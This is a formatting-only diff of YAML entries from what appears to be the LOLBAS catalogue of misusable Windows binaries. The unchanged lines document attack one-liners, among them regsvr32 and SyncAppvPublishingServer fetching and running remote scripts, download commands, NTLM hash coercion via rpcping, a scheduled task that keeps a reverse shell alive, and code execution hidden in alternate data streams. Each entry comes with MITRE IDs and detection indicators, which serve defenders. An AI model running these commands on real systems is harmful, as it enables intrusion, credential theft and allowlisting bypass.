 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: msiexec /quiet /i cmd.msi
     Description: Installs the target .MSI file silently.
@@ -35,11 +35,11 @@ Commands:
     Privileges: User
     MitreID: T1218
     MitreLink: https://attack.mitre.org/wiki/Technique/T1218
-    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10    
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\msiexec.exe
   - Path: C:\Windows\SysWOW64\msiexec.exe
-Code_Sample: 
+Code_Sample:
   - Code:
 Detection:
   - IOC: msiexec.exe getting files from Internet
@@ -51,4 +51,4 @@ Acknowledgement:
     Handle: '@netbiosX'
   - Person: Philip Tsukerman
     Handle: '@PhilipTsukerman'
----
+---

yml/OSBinaries/Netsh.yml

@@ -2,7 +2,7 @@
 Name: Netsh.exe
 Description: Netsh is a Windows tool used to manipulate network interface settings.
 Author: 'Freddie Barr-Smith'
-Created: '2019-12-24'
+Created: 2019-12-24
 Commands:
   - Command: netsh.exe add helper C:\Users\User\file.dll
     Description: Use Netsh in order to execute a .dll file and also gain persistence, every time the netsh command is called
@@ -15,7 +15,7 @@ Commands:
 Full_Path:
   - Path: C:\WINDOWS\System32\Netsh.exe
   - Path: C:\WINDOWS\SysWOW64\Netsh.exe
-Code_Sample: 
+Code_Sample:
   - Code:
 Detection:
   - IOC: Netsh initiating a network connection
@@ -32,4 +32,4 @@ Acknowledgement:
     Handle:
   - Person: 'Xabier Ugarte-Pedrero'
     Handle:
----
+---

yml/OSBinaries/Odbcconf.yml

@@ -2,7 +2,7 @@
 Name: Odbcconf.exe
 Description: Used in Windows for managing ODBC connections
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: odbcconf -f file.rsp
     Description: Load DLL specified in target .RSP file. See the Playloads folder for an example .RSP file.
@@ -23,7 +23,7 @@ Commands:
 Full_Path:
   - Path: C:\Windows\System32\odbcconf.exe
   - Path: C:\Windows\SysWOW64\odbcconf.exe
-Code_Sample: 
+Code_Sample:
 - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/file.rsp
 Detection:
  - IOC:
@@ -36,4 +36,4 @@ Acknowledgement:
     Handle: '@subtee'
   - Person: Adam
     Handle: '@Hexacorn'
----
+---

yml/OSBinaries/Pcalua.yml

@@ -2,7 +2,7 @@
 Name: Pcalua.exe
 Description: Program Compatibility Assistant
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: pcalua.exe -a calc.exe
     Description: Open the target .EXE using the Program Compatibility Assistant.
@@ -30,7 +30,7 @@ Commands:
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\pcalua.exe
-Code_Sample: 
+Code_Sample:
   - Code:
 Detection:
   - IOC:
@@ -41,4 +41,4 @@ Acknowledgement:
     Handle: '@kylehanslovan'
   - Person: Fab
     Handle: '@0rbz_'
----
+---

yml/OSBinaries/Pcwrun.yml

@@ -2,7 +2,7 @@
 Name: Pcwrun.exe
 Description: Program Compatibility Wizard
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: Pcwrun.exe c:\temp\beacon.exe
     Description: Open the target .EXE file with the Program Compatibility Wizard.
@@ -14,7 +14,7 @@ Commands:
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\pcwrun.exe
-Code_Sample: 
+Code_Sample:
 - Code:
 Detection:
  - IOC:
@@ -23,4 +23,4 @@ Resources:
 Acknowledgement:
   - Person: Pierre-Alexandre Braeken
     Handle: '@pabraeken'
----
+---

yml/OSBinaries/Pktmon.yml

@@ -2,7 +2,7 @@
 Name: Pktmon.exe
 Description: Capture Network Packets on the windows 10 with October 2018 Update or later.
 Author: 'Derek Johnson'
-Created: '2020-08-12'
+Created: 2020-08-12
 Commands:
   - Command: pktmon.exe start --etw
     Description: Will start a packet capture and store log file as PktMon.etl. Use pktmon.exe stop
@@ -23,9 +23,9 @@ Commands:
 Full_Path:
   - Path: c:\windows\system32\pktmon.exe
   - Path: c:\windows\syswow64\pktmon.exe
-Code_Sample: 
+Code_Sample:
   - Code:
-Detection: 
+Detection:
   - IOC: .etl files found on system
 Resources:
   - Link: https://binar-x79.com/windows-10-secret-sniffer/

yml/OSBinaries/Presentationhost.yml

@@ -2,7 +2,7 @@
 Name: Presentationhost.exe
 Description: File is used for executing Browser applications
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: Presentationhost.exe C:\temp\Evil.xbap
     Description: Executes the target XAML Browser Application (XBAP) file
@@ -15,7 +15,7 @@ Commands:
 Full_Path:
   - Path: C:\Windows\System32\Presentationhost.exe
   - Path: C:\Windows\SysWOW64\Presentationhost.exe
-Code_Sample: 
+Code_Sample:
 - Code:
 Detection:
  - IOC:
@@ -25,4 +25,4 @@ Resources:
 Acknowledgement:
   - Person: Casey Smith
     Handle: '@subtee'
----
+---

yml/OSBinaries/Print.yml

@@ -2,7 +2,7 @@
 Name: Print.exe
 Description: Used by Windows to send files to the printer
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe
     Description: Copy file.exe into the Alternate Data Stream (ADS) of file.txt.
@@ -31,7 +31,7 @@ Commands:
 Full_Path:
   - Path: C:\Windows\System32\print.exe
   - Path: C:\Windows\SysWOW64\print.exe
-Code_Sample: 
+Code_Sample:
 - Code:
 Detection:
  - IOC: Print.exe getting files from internet
@@ -42,4 +42,4 @@ Resources:
 Acknowledgement:
   - Person: Oddvar Moe
     Handle: '@oddvarmoe'
----
+---

yml/OSBinaries/Psr.yml

@@ -2,7 +2,7 @@
 Name: Psr.exe
 Description: Windows Problem Steps Recorder, used to record screen and clicks.
 Author: Leon Rodenko
-Created: '2020-06-27'
+Created: 2020-06-27
 Commands:
   - Command: psr.exe /start /output D:\test.zip /sc 1 /gui 0
     Description: Record a user screen without creating a GUI. You should use "psr.exe /stop" to stop recording and create output file.
@@ -15,9 +15,9 @@ Commands:
 Full_Path:
   - Path: c:\windows\system32\psr.exe
   - Path: c:\windows\syswow64\psr.exe
-Code_Sample: 
+Code_Sample:
-  - Code: 
+  - Code:
-Detection: 
+Detection:
   - IOC: psr.exe spawned
   - IOC: suspicious activity when running with "/gui 0" flag
 Resources:

yml/OSBinaries/Rasautou.yml

@@ -2,9 +2,9 @@
 Name: Rasautou.exe
 Description: Windows Remote Access Dialer
 Author: 'Tony Lambert'
-Created: '2020-01-10'
+Created: 2020-01-10
 Commands:
-  - Command: rasautou -d powershell.dll -p powershell -a a -e e 
+  - Command: rasautou -d powershell.dll -p powershell -a a -e e
     Description: Loads the target .DLL specified in -d and executes the export specified in -p. Options removed in Windows 10.
     Usecase: Execute DLL code
     Category: Execute
@@ -14,7 +14,7 @@ Commands:
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1
 Full_Path:
   - Path: C:\Windows\System32\rasautou.exe
-Code_Sample: 
+Code_Sample:
 - Code:
 Detection:
  - IOC: rasautou.exe command line containing -d and -p
@@ -24,4 +24,4 @@ Resources:
 Acknowledgement:
   - Person: FireEye
     Handle: '@FireEye'
----
+---

yml/OSBinaries/Reg.yml

@@ -2,7 +2,7 @@
 Name: Reg.exe
 Description: Used to manipulate the registry
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
     Description: Export the target Registry key and save it to the specified .REG file within an Alternate data stream.
@@ -15,7 +15,7 @@ Commands:
 Full_Path:
   - Path: C:\Windows\System32\reg.exe
   - Path: C:\Windows\SysWOW64\reg.exe
-Code_Sample: 
+Code_Sample:
 - Code:
 Detection:
  - IOC: reg.exe writing to an ADS
@@ -24,4 +24,4 @@ Resources:
 Acknowledgement:
   - Person: Oddvar Moe
     Handle: '@oddvarmoe'
----
+---

yml/OSBinaries/Regasm.yml

@@ -2,9 +2,9 @@
 Name: Regasm.exe
 Description: Part of .NET
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
-  - Command: regasm.exe AllTheThingsx64.dll 
+  - Command: regasm.exe AllTheThingsx64.dll
     Description: Loads the target .DLL file and executes the RegisterClass function.
     Usecase: Execute code and bypass Application whitelisting
     Category: AWL bypass
@@ -12,7 +12,7 @@ Commands:
     MitreID: T1121
     MitreLink: https://attack.mitre.org/wiki/Technique/T1121
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-  - Command: regasm.exe /U AllTheThingsx64.dll 
+  - Command: regasm.exe /U AllTheThingsx64.dll
     Description: Loads the target .DLL file and executes the UnRegisterClass function.
     Usecase: Execute code and bypass Application whitelisting
     Category: Execute
@@ -25,7 +25,7 @@ Full_Path:
   - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe
   - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
   - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe
-Code_Sample: 
+Code_Sample:
 - Code:
 Detection:
  - IOC: regasm.exe executing dll file

yml/OSBinaries/Regedit.yml

@@ -2,7 +2,7 @@
 Name: Regedit.exe
 Description: Used by Windows to manipulate registry
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
     Description: Export the target Registry key to the specified .REG file.
@@ -23,7 +23,7 @@ Commands:
 Full_Path:
   - Path: C:\Windows\System32\regedit.exe
   - Path: C:\Windows\SysWOW64\regedit.exe
-Code_Sample: 
+Code_Sample:
 - Code:
 Detection:
  - IOC: regedit.exe reading and writing to alternate data stream
@@ -33,4 +33,4 @@ Resources:
 Acknowledgement:
   - Person: Oddvar Moe
     Handle: '@oddvarmoe'
----
+---

yml/OSBinaries/Regini.yml

@@ -2,7 +2,7 @@
 Name: Regini.exe
 Description: Used to manipulate the registry
 Author: 'Oddvar Moe'
-Created: '2020-07-03'
+Created: 2020-07-03
 Commands:
   - Command: regini.exe newfile.txt:hidden.ini
     Description: Write registry keys from data inside the Alternate data stream.
@@ -15,7 +15,7 @@ Commands:
 Full_Path:
   - Path: C:\Windows\System32\regini.exe
   - Path: C:\Windows\SysWOW64\regini.exe
-Code_Sample: 
+Code_Sample:
 - Code:
 Detection:
  - IOC: regini.exe reading from ADS
@@ -24,4 +24,4 @@ Resources:
 Acknowledgement:
   - Person: Eli Salem
     Handle: '@elisalem9'
----
+---

yml/OSBinaries/Register-cimprovider.yml

@@ -2,7 +2,7 @@
 Name: Register-cimprovider.exe
 Description: Used to register new wmi providers
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: Register-cimprovider -path "C:\folder\evil.dll"
     Description: Load the target .DLL.
@@ -15,7 +15,7 @@ Commands:
 Full_Path:
   - Path: C:\Windows\System32\Register-cimprovider.exe
   - Path: C:\Windows\SysWOW64\Register-cimprovider.exe
-Code_Sample: 
+Code_Sample:
 - Code:
 Detection:
  - IOC:
@@ -24,4 +24,4 @@ Resources:
 Acknowledgement:
   - Person: Philip Tsukerman
     Handle: '@PhilipTsukerman'
----
+---

yml/OSBinaries/Regsvcs.yml

@@ -2,7 +2,7 @@
 Name: Regsvcs.exe
 Description: Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: regsvcs.exe AllTheThingsx64.dll
     Description: Loads the target .DLL file and executes the RegisterClass function.
@@ -23,7 +23,7 @@ Commands:
 Full_Path:
   - Path: C:\Windows\System32\regsvcs.exe
   - Path: C:\Windows\SysWOW64\regsvcs.exe
-Code_Sample: 
+Code_Sample:
 - Code:
 Detection:
  - IOC:

yml/OSBinaries/Regsvr32.yml

@@ -2,7 +2,7 @@
 Name: Regsvr32.exe
 Description: Used by Windows to register dlls
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
     Description: Execute the specified remote .SCT script with scrobj.dll.
@@ -39,7 +39,7 @@ Commands:
 Full_Path:
   - Path: C:\Windows\System32\regsvr32.exe
   - Path: C:\Windows\SysWOW64\regsvr32.exe
-Code_Sample: 
+Code_Sample:
 - Code:
 Detection:
  - IOC: regsvr32.exe getting files from Internet
@@ -51,4 +51,4 @@ Resources:
 Acknowledgement:
   - Person: Casey Smith
     Handle: '@subtee'
----
+---

yml/OSBinaries/Replace.yml

@@ -1,12 +1,12 @@
 ---
 Name: Replace.exe
-Description: Used to replace file with another file 
+Description: Used to replace file with another file
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: replace.exe C:\Source\File.cab C:\Destination /A
     Description: Copy file.cab to destination
-    Usecase: Copy files 
+    Usecase: Copy files
     Category: Copy
     Privileges: User
     MitreID: T1105
@@ -14,7 +14,7 @@ Commands:
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A
     Description: Download/Copy bar.exe to outdir
-    Usecase: Download file 
+    Usecase: Download file
     Category: Download
     Privileges: User
     MitreID: T1105
@@ -23,7 +23,7 @@ Commands:
 Full_Path:
   - Path: C:\Windows\System32\replace.exe
   - Path: C:\Windows\SysWOW64\replace.exe
-Code_Sample: 
+Code_Sample:
 - Code:
 Detection:
  - IOC: Replace.exe getting files from remote server
@@ -33,4 +33,4 @@ Resources:
 Acknowledgement:
   - Person: elceef
     Handle: '@elceef'
----
+---

yml/OSBinaries/Rpcping.yml

@@ -2,7 +2,7 @@
 Name: Rpcping.exe
 Description: Used to verify rpc connection
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM
     Description: Send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.
@@ -15,7 +15,7 @@ Commands:
 Full_Path:
   - Path: C:\Windows\System32\rpcping.exe
   - Path: C:\Windows\SysWOW64\rpcping.exe
-Code_Sample: 
+Code_Sample:
 - Code:
 Detection:
  - IOC:
@@ -28,4 +28,4 @@ Acknowledgement:
     Handle: '@subtee'
   - Person: Vincent Yiu
     Handle: '@vysecurity'
----
+---

yml/OSBinaries/Rundll32.yml

@@ -2,7 +2,7 @@
 Name: Rundll32.exe
 Description: Used by Windows to execute dll files
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: rundll32.exe AllTheThingsx64,EntryPoint
     Description: AllTheThingsx64 would be a .DLL file and EntryPoint would be the name of the entry point in the .DLL file to execute.
@@ -65,13 +65,13 @@ Commands:
     Usecase: Execute a DLL/EXE COM server payload or ScriptletURL code.
     Category: Execute
     Privileges: User
-    MitreID: 
+    MitreID:
-    MitreLink: 
+    MitreLink:
     OperatingSystem: Windows 10 (and likely previous versions)
 Full_Path:
   - Path: C:\Windows\System32\rundll32.exe
   - Path: C:\Windows\SysWOW64\rundll32.exe
-Code_Sample: 
+Code_Sample:
 - Code:
 Detection:
  - IOC:

yml/OSBinaries/Runonce.yml

@@ -1,8 +1,8 @@
 ---
 Name: Runonce.exe
-Description: 
+Description:
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: Runonce.exe /AlternateShellStartup
     Description: Executes a Run Once Task that has been configured in the registry
@@ -15,7 +15,7 @@ Commands:
 Full_Path:
   - Path: C:\Windows\System32\runonce.exe
   - Path: C:\Windows\SysWOW64\runonce.exe
-Code_Sample: 
+Code_Sample:
 - Code:
 Detection:
  - IOC: HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\YOURKEY
@@ -25,4 +25,4 @@ Resources:
 Acknowledgement:
   - Person: Pierre-Alexandre Braeken
     Handle: '@pabraeken'
----
+---

yml/OSBinaries/Runscripthelper.yml

@@ -1,8 +1,8 @@
 ---
 Name: Runscripthelper.exe
-Description: 
+Description:
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.txt C:\Test
     Description: Execute the PowerShell script named test.txt
@@ -15,7 +15,7 @@ Commands:
 Full_Path:
   - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe
   - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe
-Code_Sample: 
+Code_Sample:
 - Code:
 Detection:
  - IOC: Event 4014 - Powershell logging
@@ -25,4 +25,4 @@ Resources:
 Acknowledgement:
   - Person: Matt Graeber
     Handle: '@mattifestation'
----
+---

yml/OSBinaries/Sc.yml

@@ -2,12 +2,12 @@
 Name: Sc.exe
 Description: Used by Windows to manage services
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto\ & sc start evilservice
     Description: Creates a new service and executes the file stored in the ADS.
     Usecase: Execute binary file hidden inside an alternate data stream
-    Category: ADS 
+    Category: ADS
     Privileges: User
     MitreID: T1096
     MitreLink: https://attack.mitre.org/wiki/Technique/T1096
@@ -15,7 +15,7 @@ Commands:
 Full_Path:
   - Path: C:\Windows\System32\sc.exe
   - Path: C:\Windows\SysWOW64\sc.exe
-Code_Sample: 
+Code_Sample:
 - Code:
 Detection:
  - IOC: Services that gets created
@@ -24,4 +24,4 @@ Resources:
 Acknowledgement:
   - Person: Oddvar Moe
     Handle: '@oddvarmoe'
----
+---

yml/OSBinaries/Schtasks.yml

@@ -2,12 +2,12 @@
 Name: Schtasks.exe
 Description: Schedule periodic tasks
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr c:\some\directory\revshell.exe
     Description: Create a recurring task to execute every minute.
     Usecase: Create a recurring task, to eg. to keep reverse shell session(s) alive
-    Category: Execute 
+    Category: Execute
     Privileges: User
     MitreID: T1053
     MitreLink: https://attack.mitre.org/wiki/Technique/T1053
@@ -15,7 +15,7 @@ Commands:
 Full_Path:
   - Path: c:\windows\system32\schtasks.exe
   - Path: c:\windows\syswow64\schtasks.exe
-Code_Sample: 
+Code_Sample:
   - Code:
 Detection:
   - IOC: Services that gets created
@@ -24,4 +24,4 @@ Resources:
 Acknowledgement:
   - Person:
     Handle:
----
+---

yml/OSBinaries/Scriptrunner.yml

@@ -1,8 +1,8 @@
 ---
 Name: Scriptrunner.exe
-Description: 
+Description:
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: Scriptrunner.exe -appvscript calc.exe
     Description: Executes calc.exe
@@ -23,7 +23,7 @@ Commands:
 Full_Path:
   - Path: C:\Windows\System32\scriptrunner.exe
   - Path: C:\Windows\SysWOW64\scriptrunner.exe
-Code_Sample: 
+Code_Sample:
 - Code:
 Detection:
  - IOC: Scriptrunner.exe should not be in use unless App-v is deployed
@@ -34,4 +34,4 @@ Resources:
 Acknowledgement:
   - Person: Nick Tyrer
     Handle: '@nicktyrer'
----
+---

yml/OSBinaries/Syncappvpublishingserver.yml

@@ -2,7 +2,7 @@
 Name: SyncAppvPublishingServer.exe
 Description: Used by App-v to get App-v server lists
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX"
     Description: Example command on how inject Powershell code into the process
@@ -15,7 +15,7 @@ Commands:
 Full_Path:
   - Path: C:\Windows\System32\SyncAppvPublishingServer.exe
   - Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe
-Code_Sample: 
+Code_Sample:
 - Code:
 Detection:
  - IOC: SyncAppvPublishingServer.exe should never be in use unless App-V is deployed

yml/OSBinaries/Ttdinject.yml

@@ -2,7 +2,7 @@
 Name: Ttdinject.exe
 Description: Used by Windows 1809 and newer to Debug Time Travel (Underlying call of tttracer.exe)
 Author: 'Maxime Nadeau'
-Created: '2020-05-12'
+Created: 2020-05-12
 Commands:
   - Command: TTDInject.exe /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /Launch "C:/Windows/System32/calc.exe"
     Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated.
@@ -23,9 +23,9 @@ Commands:
 Full_Path:
   - Path: C:\Windows\System32\ttdinject.exe
   - Path: C:\Windows\Syswow64\ttdinject.exe
-Code_Sample: 
+Code_Sample:
-  - Code: 
+  - Code:
-Detection: 
+Detection:
   - IOC: Parent child relationship. Ttdinject.exe parent for executed command
   - IOC: Multiple queries made to the IFEO registry key of an untrusted executable (Ex. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\payload.exe") from the ttdinject.exe process
 Resources:

yml/OSBinaries/Tttracer.yml

@@ -2,7 +2,7 @@
 Name: Tttracer.exe
 Description: Used by Windows 1809 and newer to Debug Time Travel
 Author: 'Oddvar Moe'
-Created: '2019-11-5'
+Created: 2019-11-05
 Commands:
   - Command: tttracer.exe C:\windows\system32\calc.exe
     Description: Execute calc using tttracer.exe. Requires administrator privileges
@@ -23,7 +23,7 @@ Commands:
 Full_Path:
   - Path: C:\Windows\System32\tttracer.exe
   - Path: C:\Windows\SysWOW64\tttracer.exe
-Code_Sample: 
+Code_Sample:
 - Code:
 Detection:
  - IOC: Parent child relationship. Tttracer parent for executed command

yml/OSBinaries/Vbc.yml

@@ -2,7 +2,7 @@
 Name: vbc.exe
 Description: Binary file used for compile vbs code
 Author: Lior Adar
-Created: 27/02/2020
+Created: 2020-02-27
 Commands:
   - Command: vbc.exe /target:exe c:\temp\vbs\run.vb
     Description: Binary file used by .NET to compile vb code to .exe
@@ -11,7 +11,7 @@ Commands:
     Privileges: User
     MitreID: T1127
     MitreLink: https://attack.mitre.org/techniques/T1127/
-    OperatingSystem: Windows 10,7 
+    OperatingSystem: Windows 10,7
   - Command: vbc -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb
     Description: Description of the second command
     Usecase: A description of the usecase
@@ -19,11 +19,11 @@ Commands:
     Privileges: User
     MitreID: T1127
     MitreLink: https://attack.mitre.org/techniques/T1127/
-    OperatingSystem: Windows 10,7 
+    OperatingSystem: Windows 10,7
 Full_Path:
   - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
   - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe
-Code_Sample: 
+Code_Sample:
 - Code:
 Acknowledgement:
   - Person: Lior Adar

yml/OSBinaries/Verclsid.yml

@@ -1,8 +1,8 @@
 ---
 Name: Verclsid.exe
-Description: 
+Description:
 Author: '@bohops'
-Created: '2018-12-04'
+Created: 2018-12-04
 Commands:
   - Command: verclsid.exe /S /C {CLSID}
     Description: Used to verify a COM object before it is instantiated by Windows Explorer
@@ -15,10 +15,10 @@ Commands:
 Full_Path:
   - Path: C:\Windows\System32\verclsid.exe
   - Path: C:\Windows\SysWOW64\verclsid.exe
-Code_Sample: 
+Code_Sample:
 - Code:
 Detection:
- - IOC: 
+ - IOC:
 Resources:
   - Link: https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5
   - Link: https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/

yml/OSBinaries/Wab.yml

@@ -2,7 +2,7 @@
 Name: Wab.exe
 Description: Windows address book manager
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: wab.exe
     Description: Change HKLM\Software\Microsoft\WAB\DLLPath and execute DLL of choice
@@ -15,7 +15,7 @@ Commands:
 Full_Path:
   - Path: C:\Program Files\Windows Mail\wab.exe
   - Path: C:\Program Files (x86)\Windows Mail\wab.exe
-Code_Sample: 
+Code_Sample:
   - Code:
 Detection:
   - IOC: WAB.exe should normally never be used
@@ -25,4 +25,4 @@ Resources:
 Acknowledgement:
   - Person: Adam
     Handle: '@Hexacorn'
----
+---

yml/OSBinaries/Wmic.yml

@@ -2,7 +2,7 @@
 Name: Wmic.exe
 Description: The WMI command-line (WMIC) utility provides a command-line interface for WMI
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: wmic.exe process call create "c:\ads\file.txt:program.exe"
     Description: Execute a .EXE file stored as an Alternate Data Stream (ADS)
@@ -71,7 +71,7 @@ Commands:
 Full_Path:
   - Path: C:\Windows\System32\wbem\wmic.exe
   - Path: C:\Windows\SysWOW64\wbem\wmic.exe
-Code_Sample: 
+Code_Sample:
   - Code:
 Detection:
   - IOC: Wmic getting scripts from remote system
@@ -82,4 +82,4 @@ Resources:
 Acknowledgement:
   - Person: Casey Smith
     Handle: '@subtee'
----
+---

yml/OSBinaries/Wscript.yml

@@ -2,7 +2,7 @@
 Name: Wscript.exe
 Description: Used by Windows to execute scripts
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: wscript c:\ads\file.txt:script.vbs
     Description: Execute script stored in an alternate data stream
@@ -23,7 +23,7 @@ Commands:
 Full_Path:
   - Path: C:\Windows\System32\wscript.exe
   - Path: C:\Windows\SysWOW64\wscript.exe
-Code_Sample: 
+Code_Sample:
 - Code:
 Detection:
  - IOC: Wscript.exe executing code from alternate data streams
@@ -34,4 +34,4 @@ Acknowledgement:
     Handle: '@oddvarmoe'
   - Person: SaiLay(valen)
     Handle: '@404death'
----
+---